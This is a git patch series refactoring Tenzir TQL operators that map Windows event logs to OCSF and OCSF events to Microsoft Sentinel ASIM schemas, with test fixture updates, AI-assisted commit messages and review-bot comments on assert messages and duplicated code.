@@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 7034\n 0\n 2\n 0\n 0x8080000000000000\n \n 44321\n \n \n System\n WINHOST01.corp.local\n \n \n PayloadSvc\n 1\n \n\n", - raw_data_size: 759, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-7045.tql b/microsoft/tests/ocsf/eid-7045.tql index bd899e9..26e225f 100644 --- a/microsoft/tests/ocsf/eid-7045.tql +++ b/microsoft/tests/ocsf/eid-7045.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-7045.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-7045.txt b/microsoft/tests/ocsf/eid-7045.txt index 1dde7b2..23521d6 100644 --- a/microsoft/tests/ocsf/eid-7045.txt +++ b/microsoft/tests/ocsf/eid-7045.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 7045\n 0\n 4\n 0\n 0x8080000000000000\n \n 44322\n \n \n System\n WINHOST01.corp.local\n \n \n PayloadSvc\n C:\\tmp\\payload.exe --svc\n Own Process\n Auto Start\n LocalSystem\n \n\n", - raw_data_size: 931, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-9999.tql b/microsoft/tests/ocsf/eid-9999.tql index 0aff212..fe23989 100644 --- a/microsoft/tests/ocsf/eid-9999.tql +++ b/microsoft/tests/ocsf/eid-9999.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-9999.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-9999.txt b/microsoft/tests/ocsf/eid-9999.txt index 7e4516e..b97390e 100644 --- a/microsoft/tests/ocsf/eid-9999.txt +++ b/microsoft/tests/ocsf/eid-9999.txt 
@@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 9999\n 0\n 4\n 0\n 0x8000000000000000\n \n 999900\n \n \n Example\n WINHOST01.corp.local\n \n \n Unsupported Windows event\n \n\n", - raw_data_size: 665, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, From c4499cca20c231328fc8e05c9d83c13ce5e5ecaf Mon Sep 17 00:00:00 2001 
From: Matthias Vallentin Date: Mon, 8 Jun 2026 16:56:25 +0200 Subject: [PATCH 06/27] Simplify ASIM OCSF mappers Inline small finalization and unsupported branches instead of routing through helper UDOs. Relax Account Change mapping so missing actor names stay nullable output fields rather than rejecting the event. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/ocsf/account_change.tql | 6 ++++-- microsoft/operators/asim/ocsf/authentication.tql | 3 ++- .../operators/asim/ocsf/authorize_session.tql | 3 ++- .../operators/asim/ocsf/compliance_finding.tql | 3 ++- .../operators/asim/ocsf/detection_finding.tql | 3 ++- microsoft/operators/asim/ocsf/dhcp_activity.tql | 3 ++- microsoft/operators/asim/ocsf/dns_activity.tql | 3 ++- .../operators/asim/ocsf/entity_management.tql | 3 ++- .../operators/asim/ocsf/event_log_activity.tql | 3 ++- .../operators/asim/ocsf/file_system_activity.tql | 3 ++- microsoft/operators/asim/ocsf/group_management.tql | 3 ++- microsoft/operators/asim/ocsf/helpers/finalize.tql | 7 ------- .../operators/asim/ocsf/helpers/unsupported.tql | 12 ------------ microsoft/operators/asim/ocsf/http_activity.tql | 3 ++- microsoft/operators/asim/ocsf/map.tql | 9 ++++++++- microsoft/operators/asim/ocsf/network_activity.tql | 3 ++- microsoft/operators/asim/ocsf/process_activity.tql | 14 ++++++++++++-- .../operators/asim/ocsf/scheduled_job_activity.tql | 3 ++- .../asim/ocsf/windows_service_activity.tql | 3 ++- 19 files changed, 52 insertions(+), 38 deletions(-) delete mode 100644 microsoft/operators/asim/ocsf/helpers/finalize.tql delete mode 100644 microsoft/operators/asim/ocsf/helpers/unsupported.tql diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 8009444..908b60d 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql 
@@ -4,6 +4,8 @@ description: Maps OCSF Account Change events to Microsoft Sentinel ASIM UserMana microsoft::asim::ocsf::helpers::common +assert class_uid == 3001 + @name = "asim.user_management" asim.EventSchema = "UserManagement" asim.EventSchemaVersion = "0.1.2" @@ -13,7 +15,6 @@ if actor?.user?.domain? != null and actor?.user?.name? != null { asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" asim.ActorUsernameType = "Windows" } -assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} asim.ActorUserId = actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null @@ -43,4 +44,5 @@ asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else nu asim.SrcIpAddr = src_endpoint?.ip? asim.SrcHostname = src_endpoint?.hostname? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 57cdf0a..76f1e5b 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -55,4 +55,5 @@ if auth_factors? != null { asim.LogonMethod = auth_factors[0]?.factor_type? } -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 40be37e..4ec10d2 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql 
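Review bot: The new `assert class_uid == 3001` at the top of account_change.tql carries no `message=`, unlike every other assert in these mappers, so an event that reaches this mapper with the wrong class fails with a bare diagnostic that names neither the class nor the type. Suggest `assert class_uid == 3001, message={reason: "OCSF class is not Account Change", class_uid: class_uid?, class_name: class_name?, type_uid: type_uid?, name: @name}` so the failure is as searchable as the "insufficient OCSF fields" ones. None of the sibling mappers in this patch add an equivalent class guard, so it is worth deciding whether the guard belongs in all of them or whether the dispatch in map.tql is trusted; the rest of the mapper body runs outside this hunk.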
@@ -52,4 +52,5 @@ if auth_factors? != null { asim.LogonMethod = auth_factors[0]?.factor_type? } -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 9f95a88..de4230a 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -38,4 +38,5 @@ match verdict? { _ => {} } -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 823fe35..45d0f44 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -53,4 +53,5 @@ match verdict? { _ => {} } -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 835b82b..112fab9 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -19,4 +19,5 @@ asim.SrcMacAddr = src_endpoint?.mac? assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 6c346d0..0e48901 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql 
@@ -23,4 +23,5 @@ asim.DstIpAddr = dst_endpoint?.ip? asim.DstHostname = dst_endpoint?.hostname? assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 4ec2bd3..34a8ed0 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -37,4 +37,5 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index b764b0e..3ff486e 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -37,4 +37,5 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 1e17f87..7e2e334 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql 
@@ -34,4 +34,5 @@ asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\" assert asim.ActorUsername != null and asim.TargetFilePath != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 8ff4cea..ce7ccb2 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -39,4 +39,5 @@ asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else nu asim.SrcIpAddr = src_endpoint?.ip? asim.SrcHostname = src_endpoint?.hostname? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/helpers/finalize.tql b/microsoft/operators/asim/ocsf/helpers/finalize.tql deleted file mode 100644 index f55a356..0000000 --- a/microsoft/operators/asim/ocsf/helpers/finalize.tql +++ /dev/null @@ -1,7 +0,0 @@ ---- -description: Finalizes an initialized ASIM event and preserves the original OCSF event. ---- - -asim.AdditionalFields = {...this} -drop asim.AdditionalFields.asim -this = asim diff --git a/microsoft/operators/asim/ocsf/helpers/unsupported.tql b/microsoft/operators/asim/ocsf/helpers/unsupported.tql deleted file mode 100644 index 9d62845..0000000 --- a/microsoft/operators/asim/ocsf/helpers/unsupported.tql +++ /dev/null @@ -1,12 +0,0 @@ ---- -description: Drops unsupported OCSF to ASIM mappings with a warning. ---- - -assert false, message={ - reason: "unsupported OCSF to ASIM mapping", - class_uid: class_uid?, - class_name: class_name?, - type_uid: type_uid?, - type_name: type_name?, - name: @name, -} 
diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 95866cc..cf3c96d 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -16,4 +16,5 @@ if http_response?.code? != null { } assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql index 3fe08b4..f9025c4 100644 --- a/microsoft/operators/asim/ocsf/map.tql +++ b/microsoft/operators/asim/ocsf/map.tql @@ -52,6 +52,13 @@ match class_uid { microsoft::asim::ocsf::dhcp_activity } _ => { - microsoft::asim::ocsf::helpers::unsupported + assert false, message={ + reason: "unsupported OCSF to ASIM mapping", + class_uid: class_uid?, + class_name: class_name?, + type_uid: type_uid?, + type_name: type_name?, + name: @name, + } } } diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 8836cf6..9363d98 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -30,4 +30,5 @@ match disposition? { _ => {} } -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 6143e90..7b35b9f 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql 
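Review bot: The inlined `_ =>` fallback in map.tql loses the one line of documentation the deleted helper carried (`description: Drops unsupported OCSF to ASIM mappings with a warning.`), so a reader now has to know that a failing `assert` is what drops the event and emits the diagnostic. Suggest a comment directly above the assert, `// Unsupported class: fail the assert so the event is dropped with a diagnostic.`. The same nine-line block is duplicated verbatim in the `_ =>` branch of process_activity.tql later in this patch, so the message shape (the `reason` string and the `class_uid?`/`type_uid?` optional accesses) now has to be kept in sync by hand across both copies; a matching comment there would at least point to the other copy.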
@@ -10,7 +10,16 @@ asim.EventSchemaVersion = "0.1.4" match activity_name { "Launch" => { asim.EventType = "ProcessCreated" } "Terminate" => { asim.EventType = "ProcessTerminated" } - _ => { microsoft::asim::ocsf::helpers::unsupported } + _ => { + assert false, message={ + reason: "unsupported OCSF to ASIM mapping", + class_uid: class_uid?, + class_name: class_name?, + type_uid: type_uid?, + type_name: type_name?, + name: @name, + } + } } asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? if actor?.user?.domain? != null and actor?.user?.name? != null { @@ -28,4 +37,5 @@ asim.TargetUserId = user?.uid? assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index a32b74e..a9302c9 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -37,4 +37,5 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index ec9b967..60a3938 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql 
@@ -37,4 +37,5 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim From 874193f13fb6307d1c918eb920df2977b42f36d0 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:03:37 +0200 Subject: [PATCH 07/27] Avoid ASIM state in AdditionalFields Snapshot the OCSF source event before creating the temporary ASIM working record, then use that snapshot when populating AdditionalFields. This keeps implementation-only mapper state out of the preserved source event instead of dropping it after the fact. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/ocsf/account_change.tql | 3 +-- microsoft/operators/asim/ocsf/authentication.tql | 3 +-- microsoft/operators/asim/ocsf/authorize_session.tql | 3 +-- microsoft/operators/asim/ocsf/compliance_finding.tql | 3 +-- microsoft/operators/asim/ocsf/detection_finding.tql | 3 +-- microsoft/operators/asim/ocsf/dhcp_activity.tql | 3 +-- microsoft/operators/asim/ocsf/dns_activity.tql | 3 +-- microsoft/operators/asim/ocsf/entity_management.tql | 3 +-- microsoft/operators/asim/ocsf/event_log_activity.tql | 3 +-- microsoft/operators/asim/ocsf/file_system_activity.tql | 3 +-- microsoft/operators/asim/ocsf/group_management.tql | 3 +-- microsoft/operators/asim/ocsf/helpers/common.tql | 1 + microsoft/operators/asim/ocsf/http_activity.tql | 3 +-- microsoft/operators/asim/ocsf/network_activity.tql | 3 +-- microsoft/operators/asim/ocsf/process_activity.tql | 3 +-- microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 3 +-- microsoft/operators/asim/ocsf/windows_service_activity.tql | 3 +-- 17 files changed, 17 insertions(+), 32 deletions(-) diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 908b60d..f4cb3cd 100644 
--- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -44,5 +44,4 @@ asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else nu asim.SrcIpAddr = src_endpoint?.ip? asim.SrcHostname = src_endpoint?.hostname? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 76f1e5b..30189e8 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -55,5 +55,4 @@ if auth_factors? != null { asim.LogonMethod = auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 4ec10d2..076665b 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -52,5 +52,4 @@ if auth_factors? != null { asim.LogonMethod = auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index de4230a..08331ac 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -38,5 +38,4 @@ match verdict? { _ => {} } -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 45d0f44..96c313c 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql 
+++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -53,5 +53,4 @@ match verdict? { _ => {} } -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 112fab9..9306362 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -19,5 +19,4 @@ asim.SrcMacAddr = src_endpoint?.mac? assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 0e48901..91555f0 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -23,5 +23,4 @@ asim.DstIpAddr = dst_endpoint?.ip? asim.DstHostname = dst_endpoint?.hostname? assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 34a8ed0..05e4eb1 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql 
@@ -37,5 +37,4 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index 3ff486e..d428ef1 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -37,5 +37,4 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 7e2e334..ac54b6c 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -34,5 +34,4 @@ asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\" assert asim.ActorUsername != null and asim.TargetFilePath != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index ce7ccb2..69f3038 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql 
@@ -39,5 +39,4 @@ asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else nu asim.SrcIpAddr = src_endpoint?.ip? asim.SrcHostname = src_endpoint?.hostname? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/helpers/common.tql b/microsoft/operators/asim/ocsf/helpers/common.tql index 441db8f..afc25d3 100644 --- a/microsoft/operators/asim/ocsf/helpers/common.tql +++ b/microsoft/operators/asim/ocsf/helpers/common.tql @@ -2,6 +2,7 @@ description: Initializes shared ASIM fields from a validated OCSF event. --- +_ocsf = this asim = {} asim.EventCount = 1 diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index cf3c96d..cb366d7 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -16,5 +16,4 @@ if http_response?.code? != null { } assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 9363d98..aab0a54 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -30,5 +30,4 @@ match disposition? { _ => {} } -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 7b35b9f..4601260 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql 
@@ -37,5 +37,4 @@ asim.TargetUserId = user?.uid? assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index a9302c9..874cf5f 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -37,5 +37,4 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 60a3938..a42553b 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -37,5 +37,4 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} From cfc22ad14990d693f5b0a56fe14083e74947404a Mon Sep 17 00:00:00 2001 
From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:11:49 +0200 Subject: [PATCH 08/27] Use explicit OCSF source namespace Initialize ASIM OCSF mappers with separate ocsf and asim records, then read source fields through ocsf while building the ASIM output. Keep the account-change class assertion before the common wrapper so it validates the original OCSF event shape. Assisted-by: GPT-5 Codex (Superconductor) --- .../operators/asim/ocsf/account_change.tql | 32 +++---- .../operators/asim/ocsf/authentication.tql | 50 +++++------ .../operators/asim/ocsf/authorize_session.tql | 48 +++++------ .../asim/ocsf/compliance_finding.tql | 24 +++--- .../operators/asim/ocsf/detection_finding.tql | 26 +++--- .../operators/asim/ocsf/dhcp_activity.tql | 12 +-- .../operators/asim/ocsf/dns_activity.tql | 24 +++--- .../operators/asim/ocsf/entity_management.tql | 24 +++--- .../asim/ocsf/event_log_activity.tql | 24 +++--- .../asim/ocsf/file_system_activity.tql | 24 +++--- .../operators/asim/ocsf/group_management.tql | 30 +++---- .../operators/asim/ocsf/helpers/common.tql | 85 +++++++++---------- .../operators/asim/ocsf/http_activity.tql | 14 +-- .../operators/asim/ocsf/network_activity.tql | 22 ++--- .../operators/asim/ocsf/process_activity.tql | 34 ++++---- .../asim/ocsf/scheduled_job_activity.tql | 24 +++--- .../asim/ocsf/windows_service_activity.tql | 24 +++--- 17 files changed, 260 insertions(+), 261 deletions(-) diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index f4cb3cd..2f438a8 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql 
